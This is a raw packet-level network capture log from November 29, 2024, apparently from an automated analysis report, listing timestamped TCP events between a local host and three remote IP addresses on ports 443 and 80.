                                                                                                                                                                                    Nov 29, 2024 19:49:29.165432930 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.165518045 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.165695906 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.165718079 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.165730953 CET49743443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.165736914 CET4434974313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.168329954 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.168361902 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.168442965 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.168647051 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.168658972 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.448929071 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.449363947 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.449379921 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.449837923 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.449843884 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894206047 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894268990 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894382954 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894555092 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894579887 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894598961 CET49744443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.894604921 CET4434974413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.897454023 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.897502899 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:29.897600889 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.897758961 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:29.897770882 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.630393028 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.631136894 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:30.631164074 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.631640911 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:30.631647110 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.636183977 CET44349728104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.636276007 CET44349728104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.636328936 CET49728443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:30.636502028 CET49728443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:30.636518955 CET44349728104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.645693064 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:30.645723104 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.645817041 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:30.646100044 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:30.646112919 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.950963974 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.951575994 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:30.951598883 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.952044010 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:30.952049017 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.990478992 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.991000891 CET49746443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:30.991023064 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:30.991446972 CET49746443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:30.991451979 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066572905 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066638947 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066688061 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066905975 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066921949 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066932917 CET49745443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.066937923 CET4434974513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.077562094 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.077608109 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.077663898 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.077872992 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.077892065 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.396720886 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.396796942 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.396889925 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.397105932 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.397125006 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.397135973 CET49747443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.397141933 CET4434974713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.399919033 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.399950027 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.400052071 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.400192022 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.400203943 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444555044 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444628954 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444680929 CET49746443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444847107 CET49746443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444866896 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444875956 CET49746443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.444884062 CET4434974613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.447849035 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.447880030 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.447967052 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.448120117 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.448134899 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.614824057 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.615628004 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.615643024 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.616213083 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:31.616219997 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.969647884 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.969755888 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:31.973865986 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:31.973874092 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.974103928 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:31.983232021 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:31.983266115 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:31.983302116 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050635099 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050695896 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050753117 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050904036 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050904036 CET49748443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050925016 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.050940990 CET4434974813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.053625107 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.053674936 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.053751945 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.053929090 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.053947926 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.261605978 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.262048960 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.262065887 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.262489080 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.262495041 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.697699070 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.697763920 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.697844982 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.698019981 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.698035955 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.698055983 CET49741443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.698065042 CET4434974113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.701239109 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.701278925 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.701347113 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.701510906 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.701525927 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.776312113 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.776401997 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.776458025 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:32.798713923 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:32.798738956 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.798753977 CET49749443192.168.2.6104.21.16.9
                                                                                                                                                                                    Nov 29, 2024 19:49:32.798759937 CET44349749104.21.16.9192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.813960075 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:32.869554996 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.870126963 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.870147943 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.870722055 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:32.870726109 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.933897972 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:32.934026003 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:32.934181929 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:33.055589914 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.230690002 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.231301069 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.231322050 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.231779099 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.231784105 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.247154951 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.247580051 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.247611046 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.247992039 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.247997999 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317090034 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317156076 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317378998 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317408085 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317434072 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317447901 CET49750443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.317454100 CET4434975013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.320317984 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.320367098 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.320455074 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.320647955 CET49756443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.320663929 CET4434975613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.675645113 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.675721884 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.675770998 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.675990105 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.675996065 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.676017046 CET49752443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.676027060 CET4434975213.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.679364920 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.679404020 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.679651976 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.679830074 CET49757443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.679843903 CET4434975713.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.702797890 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.702871084 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.702950954 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.703092098 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.703107119 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.703119040 CET49751443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.703124046 CET4434975113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.706038952 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.706093073 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.706465006 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.706605911 CET49758443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.706629992 CET4434975813.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.769736052 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.771986961 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.772005081 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:33.772449970 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:33.772456884 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205018044 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205074072 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205128908 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205321074 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205333948 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205343962 CET49753443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.205348969 CET4434975313.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.208043098 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.208071947 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.208144903 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.208436966 CET49759443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.208451986 CET4434975913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313736916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313926935 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313939095 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313951969 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313962936 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313975096 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.313987970 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314027071 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314069033 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314208984 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314265013 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314277887 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314292908 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314301968 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.314332008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.434178114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.434190989 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.434283018 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.482639074 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.483181953 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.483208895 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.483706951 CET49754443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:34.483711958 CET4434975413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.514735937 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.555090904 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.555108070 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.555190086 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.601989985 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.643141031 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675133944 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675152063 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675200939 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675203085 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675218105 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675230026 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675240993 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675251961 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675262928 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675268888 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675282955 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675297976 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675311089 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675324917 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675425053 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675438881 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675457954 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675470114 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675481081 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675488949 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675493956 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675506115 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675508976 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675518990 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675538063 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.675559998 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.715799093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.715969086 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.716034889 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.718362093 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.718456030 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.718513012 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.726862907 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.727015018 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.727062941 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.763290882 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.763432980 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.763489008 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.795830965 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.795934916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.795980930 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.799938917 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.800082922 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.800134897 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.808224916 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.808316946 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.808372974 CET4975580192.168.2.6185.215.113.16
                                                                                                                                                                                    Nov 29, 2024 19:49:34.816672087 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.816776991 CET8049755185.215.113.16192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:34.816828966 CET4975580192.168.2.6185.215.113.16
